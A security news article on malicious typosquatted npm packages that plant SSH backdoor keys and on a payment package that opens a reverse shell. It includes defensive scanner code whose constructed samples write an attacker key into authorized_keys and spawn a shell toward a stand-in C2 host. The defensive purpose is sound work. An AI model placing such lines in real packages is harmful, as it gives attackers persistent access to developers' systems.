Cybersecurity researchers have discovered three malicious packages in the npm registry that masquerade as a legitimate Telegram bot library. These packages not only deceive developers but also introduce SSH backdoors and enable data exfiltration on compromised systems. The findings were disclosed by supply chain security firm Socket, which highlighted the growing risks posed by malicious open-source software components.
Imitating a Popular Library
The three rogue npm packages uncovered are:
- node-telegram-utils (132 downloads)
- node-telegram-bots-api (82 downloads)
- node-telegram-util (73 downloads)
While those download counts look low, experts warn that even a single compromised installation can have serious consequences. The packages imitate node-telegram-bot-api, a widely used Node.js wrapper for Telegram's Bot API with over 100,000 weekly downloads; the impostor names differ from the real one by a single letter or a swapped suffix, the classic typosquatting pattern.
“While that number may sound modest, it only takes a single compromised environment to pave the way for wide-scale infiltration or unauthorized data access,” said Kush Pandya, a security researcher at Socket. “Supply chain security incidents repeatedly show that even a handful of installs can have catastrophic repercussions, especially when attackers gain direct access to developer systems or production servers.”
Starjacking: A Deceptive Technique
To boost their credibility and fool developers, the malicious packages employ a tactic called starjacking: the repository link in the package's metadata (the repository field of package.json) points at the GitHub repository of a legitimate open-source project, in this case node-telegram-bot-api.
The npm registry does not validate that the repository listed in a package's metadata belongs to the package's author, so the stars, contributors, and commit history of the real project appear to vouch for the impostor. This social engineering trick can deceive even seasoned developers, who may judge a package by the popularity of the linked repository. The check that defeats it is to look at the linked repository itself and confirm that it publishes a package under the same name.
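As an added example (not Socket's tooling and not code from any of the projects named here), the following Node.js script performs that check: it normalises the many shapes npm accepts for the repository field into a GitHub owner/repo pair, then compares the package name on the registry with the name declared in the linked repository's own package.json. The two manifests are constructed for the example and the owner example-org is a placeholder; in practice you would fetch https://registry.npmjs.org/<name>/latest and the repository's package.json yourself and pass them in.

```javascript
// Added example: verify a package's "repository" claim instead of trusting it.
// npm copies the repository field from package.json without checking that the
// linked repo has anything to do with the package, so a starjacked package
// points at someone else's repository. The tell is that the repository's own
// package.json publishes a different name.

// Normalise the shapes npm accepts for "repository" into { owner, repo }.
// Returns null when the field is absent or does not point at github.com.
function parseGitHubRepo(repository) {
  let s = (typeof repository === 'string' ? repository : (repository && repository.url) || '').trim();
  if (!s) return null;
  s = s.replace(/^git\+/, '');                                  // git+https://..., git+ssh://...
  s = s.replace(/^github:/, 'https://github.com/');             // github:owner/repo
  s = s.replace(/^(?:git@|ssh:\/\/git@)github\.com[/:]/, 'https://github.com/');
  s = s.replace(/^git:\/\//, 'https://');
  if (/^[\w.-]+\/[\w.-]+$/.test(s)) s = 'https://github.com/' + s; // owner/repo shorthand
  const m = s.match(/^https?:\/\/(?:www\.)?github\.com\/([\w.-]+)\/([\w.-]+?)(?:\.git)?\/?$/);
  return m ? { owner: m[1], repo: m[2] } : null;
}

// registryManifest: the manifest the npm registry serves for the package.
// repoManifest: the package.json read from the linked GitHub repository, or
// null if it could not be loaded.
function checkRepositoryClaim(registryManifest, repoManifest) {
  const target = parseGitHubRepo(registryManifest.repository);
  if (!target) {
    return { verdict: 'no-github-repo', reason: 'no GitHub repository claimed' };
  }
  const repo = `${target.owner}/${target.repo}`;
  if (!repoManifest || typeof repoManifest.name !== 'string') {
    return { verdict: 'unverified', repo, reason: 'could not read package.json from the linked repository' };
  }
  if (repoManifest.name !== registryManifest.name) {
    return {
      verdict: 'starjacking-suspected',
      repo,
      reason: `linked repository publishes "${repoManifest.name}", registry package is "${registryManifest.name}"`,
    };
  }
  return { verdict: 'ok', repo };
}

// Constructed sample data (not real registry responses; example-org is a
// placeholder owner). The lookalike package claims the legitimate library's
// repository, but that repository's package.json carries the legitimate name.
const SAMPLE_REGISTRY_MANIFEST = {
  name: 'node-telegram-utils',
  version: '1.0.0',
  repository: { type: 'git', url: 'git+https://github.com/example-org/node-telegram-bot-api.git' },
};
const SAMPLE_REPO_PACKAGE_JSON = { name: 'node-telegram-bot-api' };

if (typeof require !== 'undefined' && require.main === module) {
  console.log(checkRepositoryClaim(SAMPLE_REGISTRY_MANIFEST, SAMPLE_REPO_PACKAGE_JSON));
}
```

A verdict of 'unverified' (the repository exists but its package.json could not be read, or has no name) deserves the same scrutiny as a mismatch; a legitimate project almost always has one at the repository root.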
SSH Backdoors Targeting Linux Environments
Socket's analysis found that the packages target Linux systems and plant an SSH backdoor that survives removal of the package. On installation, the packages run a script that appends two attacker-controlled SSH public keys to the victim's ~/.ssh/authorized_keys file, which gives the attacker persistent remote login to the system without the victim's knowledge.
The malicious code also performs basic reconnaissance by:
- Retrieving the system's username
- Fetching the external IP address via a request to ipinfo[.]io/ip
- Sending a beacon to solana.validator[.]blog to confirm successful infection
What makes these packages particularly dangerous is their persistence. Uninstalling the package deletes its files from node_modules, but nothing reverts what its install script wrote elsewhere: the added SSH keys remain in ~/.ssh/authorized_keys, leaving the system open to continued access.
“This kind of post-install persistence mechanism is a strong reminder that uninstalling a malicious package doesn’t necessarily neutralize the threat it introduced,” Socket warned.
Reverse Shell via Fake Payment Integration
In a related finding, Socket also exposed another malicious package, @naderabdi/merchant-advcash, which attempts to open a reverse shell under specific runtime conditions. The package poses as a utility for integrating Volet (formerly Advcash), a platform that supports both cryptocurrency and fiat payments.
Unlike most malicious npm packages, which run their payload during installation or on import, @naderabdi/merchant-advcash delays execution until runtime, specifically until a payment success handler is invoked. Install-time sandboxes and import-time analysis therefore see nothing, which reduces the likelihood of detection during initial scans.
“The package contains hardcoded logic that opens a reverse shell to a remote server upon invocation of a payment success handler,” the Socket report noted. “This level of conditional execution allows the malware to stay dormant until triggered, making it particularly stealthy.”
This tactic reflects an increasing trend in open-source malware—embedding malicious logic in business logic paths, such as payment callbacks or admin features, to remain undetected until specific conditions are met.
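The two behaviours described above, an install-time script and a payload hidden in a runtime handler, are what a reviewer should look for before trusting a package. As an added example (not Socket's tooling, and not code from any package named in this article), the following Node.js scan reports lifecycle hooks that run at install and flags process and network primitives by file, line and the enclosing function, so a finding reads as "spawn( inside onPaymentSuccess" rather than just "uses child_process". The manifest and source files are constructed stand-ins modelled on the behaviours the article describes; the scanner is a line heuristic for triage, not a parser, and will produce false positives on names such as connect.

```javascript
// Added example: review-time scan of an npm package for (1) lifecycle scripts
// that run at install and (2) process or socket primitives that sit inside
// ordinary-looking business logic. Heuristic line scanner, not a parser.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Indicators worth a human look. Each is a pattern over one source line.
const INDICATORS = [
  { id: 'require-child_process', re: /require\(\s*['"]child_process['"]\s*\)/ },
  { id: 'require-raw-socket',    re: /require\(\s*['"](?:net|tls|dgram)['"]\s*\)/ },
  { id: 'process-exec',          re: /\b(?:spawn|spawnSync|exec|execSync|execFile|execFileSync|fork)\s*\(/ },
  { id: 'outbound-connect',      re: /\b(?:connect|createConnection)\s*\(/ },
  { id: 'ssh-authorized-keys',   re: /authorized_keys/ },
  { id: 'external-ip-lookup',    re: /ipinfo\.io/ },
];

// Remembers the most recent function-like declaration seen above a line so a
// finding can name the handler it sits in. Crude by design: no nesting, no
// block tracking.
const FN_DECL = /(?:\bfunction\s+([A-Za-z_$][\w$]*)|\b([A-Za-z_$][\w$]*)\s*[:=]\s*(?:async\s+)?(?:function\b|\([^)]*\)\s*=>|[A-Za-z_$][\w$]*\s*=>))/;

function scanSource(relPath, source) {
  const findings = [];
  let current = '(module top level)';
  source.split(/\r?\n/).forEach((text, idx) => {
    const decl = text.match(FN_DECL);
    if (decl) current = decl[1] || decl[2];
    for (const ind of INDICATORS) {
      if (ind.re.test(text)) findings.push({ file: relPath, line: idx + 1, id: ind.id, inFunction: current });
    }
  });
  return findings;
}

// manifest: parsed package.json; files: { relativePath: sourceText }.
function scanPackage(manifest, files) {
  const scripts = manifest.scripts || {};
  const installHooks = INSTALL_HOOKS.filter((h) => scripts[h]).map((h) => ({ hook: h, command: scripts[h] }));
  const indicators = Object.entries(files).flatMap(([p, src]) => scanSource(p, src));
  return { installHooks, indicators };
}

// Constructed sample package (name, hook, and file contents are invented to
// illustrate the two behaviours above; not the real packages' code).
const SAMPLE_MANIFEST = {
  name: 'constructed-example',
  version: '1.0.0',
  scripts: { postinstall: 'node scripts/setup.js', test: 'node test.js' },
};
const SAMPLE_FILES = {
  'scripts/setup.js': [
    "const fs = require('fs');",
    "const { execSync } = require('child_process');",
    "// runs at install time via the postinstall hook",
    "fs.appendFileSync(process.env.HOME + '/.ssh/authorized_keys', ATTACKER_KEY + '\\n');",
    "execSync('curl -s ipinfo.io/ip');",
  ].join('\n'),
  'lib/index.js': [
    "const net = require('net');",
    "const { spawn } = require('child_process');",
    "function createPayment(opts) {",
    "  return { id: 'pay_1', ...opts };",
    "}",
    "function onPaymentSuccess(payment) {",
    "  // dormant until a payment succeeds; nothing runs at install or import",
    "  const sock = net.connect(4444, 'c2.example.invalid');",
    "  const sh = spawn('/bin/sh');",
    "  // shell and socket wired together here (omitted)",
    "  return payment;",
    "}",
    "module.exports = { createPayment, onPaymentSuccess };",
  ].join('\n'),
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanPackage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
}
```

The useful output is the combination: a postinstall hook plus authorized_keys and an external IP lookup in the script it runs, and a socket connect plus a shell spawn inside a handler that legitimately should only touch payment data. Either pattern on its own is a prompt to read the code; together they are the two cases from this article.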
Growing Risks in the Open-Source Ecosystem
These discoveries further highlight the vulnerabilities within the open-source software ecosystem, particularly in widely used package repositories like npm. Attackers increasingly target developers through supply chain attacks, knowing that compromising a single widely used package can lead to cascading damage across multiple applications and systems.
To mitigate the risk, experts urge developers to:
- Vet packages before installation: check the maintainer account, the publish history and download trend, and whether the linked repository actually publishes a package of that name, rather than trusting the repository link or its star count
- Use automated tools such as Socket, Snyk, or npm audit to detect potential malware (note that npm audit only reports packages with a published advisory, so it will not catch a package nobody has reported yet)
- Disable lifecycle scripts where they are not needed (npm install --ignore-scripts, or npm config set ignore-scripts true) so a package cannot run code at install time
- Monitor ~/.ssh/authorized_keys for unauthorized changes and conduct regular system audits
As the sophistication of malicious npm packages grows, the open-source community and security researchers must continue working together to improve trust and safety in software supply chains.